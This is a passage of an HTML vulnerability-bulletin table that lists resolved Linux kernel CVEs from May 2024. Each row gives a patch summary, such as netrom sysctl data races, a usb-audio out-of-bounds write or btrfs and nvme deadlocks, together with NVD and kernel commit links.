<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27424" target="_blank">CVE-2024-27424</a><br><a href="https://git.kernel.org/stable/c/0a30016e892bccabea30af218782c4b6ce0970af" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1f60795dcafc97c45984240d442cdc151f825977" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/43547d8699439a67b78d6bb39015113f7aa360fd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4ccad39009e7bd8a03d60a97c87b0327ae812880" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5ac337138272d26d6d3d4f71bc5b1a87adf8b24d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7782e5e7047cae6b9255ee727c99fc73d77cf773" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/85f34d352f4b79afd63dd13634b23dafe6b570f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f3315a6edaec12b461031eab8c98c78111a41f95" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_acknowledge_delay We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27425" target="_blank">CVE-2024-27425</a><br><a href="https://git.kernel.org/stable/c/33081e0f34899d5325e7c45683dd8dc9cb18b583" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/34c84e0036a60e7e50ae50b42ed194d8daef8cc9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5deaef2bf56456c71b841e0dfde1bee2fd88c4eb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6133a71c75dacea12fcc85838b4455c2055b0f14" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7d56ffc51ebd2777ded8dca50d631ee19d97db5c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/80578681ea274e0a6512bb7515718c206a7b74cf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/806f462ba9029d41aadf8ec93f2f99c5305deada" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a22f9194f61ad4f2b6405c7c86bee85eac1befa5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_maximum_tries We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27426" target="_blank">CVE-2024-27426</a><br><a href="https://git.kernel.org/stable/c/34a164d2448264b62af82bc0af3d2c83d12d38ac" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/42e71408e2c138be9ccce60920bd6cf094ba1e32" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/84b8486e9cedc93875f251ba31abcf73bd586a3a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d28fa5f0e6c1554e2829f73a6a276c9a49689d04" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e799299aafed417cc1f32adccb2a0e5268b3f6d5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f716a68234242f95305dffb5c9426caa64b316b0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f84f7709486d8a578ab4b7d2a556d1b1a59cfc97" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fa3f3ab5c399852d32a0c3cbb8c55882f7e2c61f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_timeout We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27427" target="_blank">CVE-2024-27427</a><br><a href="https://git.kernel.org/stable/c/291d36d772f5ea5c68a263ee440f2c9eade371c9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/500936692ccca8617a955652d1929f079b17a201" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5d5c14efc987900509cec465af26608e39ac607c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/60a7a152abd494ed4f69098cf0f322e6bb140612" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7d1e00fc2af3b7c30835d643a3655b7e9ff7cb20" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b8006cb0a34aaf85cdd8741f4148fd9c76b351d3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eadec8da4451c2c0897199691184602e4ee497d1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fed835d415766a94fc0246dcebc3af4c03fe9941" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix data-races around sysctl_netrom_network_ttl_initialiser We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27428" target="_blank">CVE-2024-27428</a><br><a href="https://git.kernel.org/stable/c/119cae5ea3f9e35cdada8e572cc067f072fa825a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5731369af2de21695fe7c1c91fe134fabe5b33b8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/775ed3549819f814a6ecef5726d2b4c23f249b77" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a47d68d777b41862757b7e3051f2d46d6e25f87b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/acc653e8a3aaab1b7103f98645f2cce7be89e3d3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d1261bde59a3a087ab0c81181821e194278d9264" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dca1d93fe42fb9c42b66f61714fbdc55c87eb002" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eda02a0bed550f07a8283d3e1f25b90a38e151ed" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_obsolescence_count_initialiser We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27429" target="_blank">CVE-2024-27429</a><br><a href="https://git.kernel.org/stable/c/18c95d11c347a12e5c31df1325cef6b995d14ecf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1e84b108f2a71daa8d04032e4d2096522376debb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/591192c3a9fc728a0af7b9dd50bf121220062293" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7e1e25891f090e24a871451c9403abac63cb45dd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b3f0bc3a315cf1af03673a0163c08fe037587acd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cfd9f4a740f772298308b2e6070d2c744fb5cf79" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e3a3718b1723253d4f068e88e81d880d71f1a1e9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e439607291c082332e1e35baf8faf8552e6bcb4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_default_path_quality We need to protect the reader reading sysctl_netrom_default_path_quality because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27430" target="_blank">CVE-2024-27430</a><br><a href="https://git.kernel.org/stable/c/392eb88416dcbc5f1d61b9a88d79d78dc8b27652" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7510b08c5f5ba15983da004b021fc6154eeb4047" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7644df766006d4878a556e427e3ecc78c2d5606b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7f615232556f3c6e3eeecef96ef2b00d0aa905bb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/958d6145a6d9ba9e075c921aead8753fb91c9101" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bbc21f134b89535d1cf110c5f2b33ac54e5839c4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dec82a8fc45c6ce494c2cb31f001a2aadb132b57" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e041df5dc9e68adffcba5499ca28e1252bed6f4b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: cpumap: Zero-initialise xdp_rxq_info struct before running XDP program When running an XDP program that is attached to a cpumap entry, we don't initialise the xdp_rxq_info data structure being used in the xdp_buff that backs the XDP program invocation. Tobias noticed that this leads to random values being returned as the xdp_md-&gt;rx_queue_index value for XDP programs running in a cpumap. This means we're basically returning the contents of the uninitialised memory, which is bad. Fix this by zero-initialising the rxq data structure before running the XDP program.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27431" target="_blank">CVE-2024-27431</a><br><a href="https://git.kernel.org/stable/c/2487007aa3b9fafbd2cb14068f49791ce1d7ede5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5f4e51abfbe6eb444fa91906a5cd083044278297" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eaa7cb836659ced2d9f814ac32aa3ec193803ed6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f0363af9619c77730764f10360e36c6445c12f7b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f562e4c4aab00986dde3093c4be919c3f2b85a4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: fix PPE hanging issue A patch to resolve an issue was found in MediaTek's GPL-licensed SDK: In the mtk_ppe_stop() function, the PPE scan mode is not disabled before disabling the PPE. This can potentially lead to a hang during the process of disabling the PPE. Without this patch, the PPE may experience a hang during the reboot test.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27432" target="_blank">CVE-2024-27432</a><br><a href="https://git.kernel.org/stable/c/09a1907433865b7c8ee6777e507f5126bdd38c0f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/49202a8256fc50517ef06fd5e2084c4febde6369" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/943c14ece95eb1cf98d477462aebcbfdfd714633" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9fcadd125044007351905d40c405fadc2d3bb6d6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ea80e3ed09ab2c2b75724faf5484721753e92c31" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f78807362828ad01db2a9ed005bf79501b620f27" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: clk: mediatek: mt7622-apmixedsys: Fix an error handling path in clk_mt8135_apmixed_probe() 'clk_data' is allocated with mtk_devm_alloc_clk_data(). So calling mtk_free_clk_data() explicitly in the remove function would lead to a double-free. Remove the redundant call.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27433" target="_blank">CVE-2024-27433</a><br><a href="https://git.kernel.org/stable/c/a32e88f2b20259f5fe4f8eed598bbc85dc4879ed" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/de3340533bd68a7b3d6be1841b8eb3fa6c762fe6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f3633fed984f1db106ff737a0bb52fadb2d89ac7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fa761ce7a1d15cca1a306b3635f81a22b15fee5b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: don't set the MFP flag for the GTK The firmware doesn't need the MFP flag for the GTK, it can even make the firmware crash. in case the AP is configured with: group cipher TKIP and MFPC. We would send the GTK with cipher = TKIP and MFP which is of course not possible.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27434" target="_blank">CVE-2024-27434</a><br><a href="https://git.kernel.org/stable/c/40405cbb20eb6541c603e7b3d54ade0a7be9d715" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/60f6d5fc84a9fd26528a24d8a267fc6a6698b628" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b4f1b0b3b91762edd19bf9d3b2e4c3a0740501f8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e35f316bce9e5733c9826120c1838f4c447b2c4c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: nvme: fix reconnection fail due to reserved tag allocation We found a issue on production environment while using NVMe over RDMA, admin_q reconnect failed forever while remote target and network is ok. After dig into it, we found it may caused by a ABBA deadlock due to tag allocation. In my case, the tag was hold by a keep alive request waiting inside admin_q, as we quiesced admin_q while reset ctrl, so the request maked as idle and will not process before reset success. As fabric_q shares tagset with admin_q, while reconnect remote target, we need a tag for connect command, but the only one reserved tag was held by keep alive command which waiting inside admin_q. As a result, we failed to reconnect admin_q forever. In order to fix this issue, I think we should keep two reserved tags for admin queue.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27435" target="_blank">CVE-2024-27435</a><br><a href="https://git.kernel.org/stable/c/149afee5c7418ec5db9d7387b9c9a5c1eb7ea2a8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/262da920896e2f2ab0e3947d9dbee0aa09045818" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6851778504cdb49431809b4ba061903d5f592c96" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/de105068fead55ed5c07ade75e9c8e7f86a00d1d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ff2f90f88d78559802466ad1c84ac5bda4416b3a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Stop parsing channels bits when all channels are found. If a usb audio device sets more bits than the amount of channels it could write outside of the map array.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27436" target="_blank">CVE-2024-27436</a><br><a href="https://git.kernel.org/stable/c/22cad1b841a63635a38273b799b4791f202ade72" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5cd466673b34bac369334f66cbe14bb77b7d7827" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/629af0d5fe94a35f498ba2c3f19bd78bfa591be6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6d5dc96b154be371df0d62ecb07efe400701ed8a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6d88b289fb0a8d055cb79d1c46a56aba7809d96d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9e60f0f9730026714468770f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9af1658ba293458ca6a13f70637b9654fa4be064" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a39d51ff1f52cd0b6fe7d379ac93bd8b4237d1b7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c8a24fd281dcdf3c926413dafbafcf35cde517a9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: btrfs: fix deadlock with fiemap and extent locking While working on the patchset to remove extent locking I got a lockdep splat with fiemap and pagefaulting with my new extent lock replacement lock. This deadlock exists with our normal code, we just don't have lockdep annotations with the extent locking so we've never noticed it. Since we're copying the fiemap extent to user space on every iteration we have the chance of pagefaulting. Because we hold the extent lock for the entire range we could mkwrite into a range in the file that we have mmap'ed. This would deadlock with the following stack trace [&lt;0&gt;] lock_extent+0x28d/0x2f0 [&lt;0&gt;] btrfs_page_mkwrite+0x273/0x8a0 [&lt;0&gt;] do_page_mkwrite+0x50/0xb0 [&lt;0&gt;] do_fault+0xc1/0x7b0 [&lt;0&gt;] __handle_mm_fault+0x2fa/0x460 [&lt;0&gt;] handle_mm_fault+0xa4/0x330 [&lt;0&gt;] do_user_addr_fault+0x1f4/0x800 [&lt;0&gt;] exc_page_fault+0x7c/0x1e0 [&lt;0&gt;] asm_exc_page_fault+0x26/0x30 [&lt;0&gt;] rep_movs_alternative+0x33/0x70 [&lt;0&gt;] _copy_to_user+0x49/0x70 [&lt;0&gt;] fiemap_fill_next_extent+0xc8/0x120 [&lt;0&gt;] emit_fiemap_extent+0x4d/0xa0 [&lt;0&gt;] extent_fiemap+0x7f8/0xad0 [&lt;0&gt;] btrfs_fiemap+0x49/0x80 [&lt;0&gt;] __x64_sys_ioctl+0x3e1/0xb50 [&lt;0&gt;] do_syscall_64+0x94/0x1a0 [&lt;0&gt;] entry_SYSCALL_64_after_hwframe+0x6e/0x76 I wrote an fstest to reproduce this deadlock without my replacement lock and verified that the deadlock exists with our existing locking. To fix this simply don't take the extent lock for the entire duration of the fiemap. This is safe in general because we keep track of where we are when we're searching the tree, so if an ordered extent updates in the middle of our fiemap call we'll still emit the correct extents because we know what offset we were on before. The only place we maintain the lock is searching delalloc. Since the delalloc stuff can change during writeback we want to lock the extent range so we have a consistent view of delalloc at the time we're checking to see if we need to set the delalloc flag. With this patch applied we no longer deadlock with my testcase.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35784" target="_blank">CVE-2024-35784</a><br><a href="https://git.kernel.org/stable/c/89bca7fe6382d61e88c67a0b0e7bce315986fb8b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b0ad381fa7690244802aed119b478b4bdafc31dd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ded566b4637f1b6b4c9ba74e7d0b8493e93f19cf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: tee: optee: Fix kernel panic caused by incorrect error handling The error path while failing to register devices on the TEE bus has a bug leading to kernel panic as follows: [ 15.398930] Unable to handle kernel paging request at virtual address ffff07ed00626d7c [ 15.406913] Mem abort info: [ 15.409722] ESR = 0x0000000096000005 [ 15.413490] EC = 0x25: DABT (current EL), IL = 32 bits [ 15.418814] SET = 0, FnV = 0 [ 15.421878] EA = 0, S1PTW = 0 [ 15.425031] FSC = 0x05: level 1 translation fault [ 15.429922] Data abort info: [ 15.432813] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000 [ 15.438310] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 15.443372] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 15.448697] swapper pgtable: 4k pages, 48-bit VAs, pgdp=00000000d9e3e000 [ 15.455413] [ffff07ed00626d7c] pgd=1800000bffdf9003, p4d=1800000bffdf9003, pud=0000000000000000 [ 15.464146] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP Commit 7269cba53d90 ("tee: optee: Fix supplicant based device enumeration") lead to the introduction of this bug. So fix it appropriately.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35785" target="_blank">CVE-2024-35785</a><br><a href="https://git.kernel.org/stable/c/4b12ff5edd141926d49c9ace4791adf3a4902fe7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/520f79c110ff712b391b3d87fcacf03c74bc56ee" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/95915ba4b987cf2b222b0f251280228a1ff977ac" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bc40ded92af55760d12bec8222d4108de725dbe4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bfa344afbe472a9be08f78551fa2190c1a07d7d3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e5b5948c769aa1ebf962dddfb972f87d8f166f95" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: fix stale locked mutex in nouveau_gem_ioctl_pushbuf If VM_BIND is enabled on the client the legacy submission ioctl can't be used, however if a client tries to do so regardless it will return an error. In this case the clients mutex remained unlocked leading to a deadlock inside nouveau_drm_postclose or any other nouveau ioctl call.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35786" target="_blank">CVE-2024-35786</a><br><a href="https://git.kernel.org/stable/c/b466416bdd6ecbde15ce987226ea633a0268fbb1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c288a61a48ddb77ec097e11ab81b81027cd4e197" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/daf8739c3322a762ce84f240f50e0c39181a41ab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: md/md-bitmap: fix incorrect usage for sb_index Commit d7038f951828 ("md-bitmap: don't use -&gt;index for pages backing the bitmap file") removed page-&gt;index from bitmap code, but left wrong code logic for clustered-md. current code never set slot offset for cluster nodes, will sometimes cause crash in clustered env. Call trace (partly): md_bitmap_file_set_bit+0x110/0x1d8 [md_mod] md_bitmap_startwrite+0x13c/0x240 [md_mod] raid1_make_request+0x6b0/0x1c08 [raid1] md_handle_request+0x1dc/0x368 [md_mod] md_submit_bio+0x80/0xf8 [md_mod] __submit_bio+0x178/0x300 submit_bio_noacct_nocheck+0x11c/0x338 submit_bio_noacct+0x134/0x614 submit_bio+0x28/0xdc submit_bh_wbc+0x130/0x1cc submit_bh+0x1c/0x28</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35787" target="_blank">CVE-2024-35787</a><br><a href="https://git.kernel.org/stable/c/55e55eb65fd5e09faf5a0e49ffcdd37905aaf4da" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5a95815b17428ce2f56ec18da5e0d1b2a1a15240" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/736ad6c577a367834118f57417038d45bb5e0a31" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ecbd8ebb51bf7e4939d83b9e6022a55cac44ef06" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix bounds check for dcn35 DcfClocks [Why] NumFclkLevelsEnabled is used for DcfClocks bounds check instead of designated NumDcfClkLevelsEnabled. That can cause array index out-of-bounds access. [How] Use designated variable for dcn35 DcfClocks bounds check.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35788" target="_blank">CVE-2024-35788</a><br><a href="https://git.kernel.org/stable/c/2f10d4a51bbcd938f1f02f16c304ad1d54717b96" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c373f233dab44a13752daec13788e2ad3bf86410" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f6e163e9c3d50cd167ab9d411ed01b7718177387" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
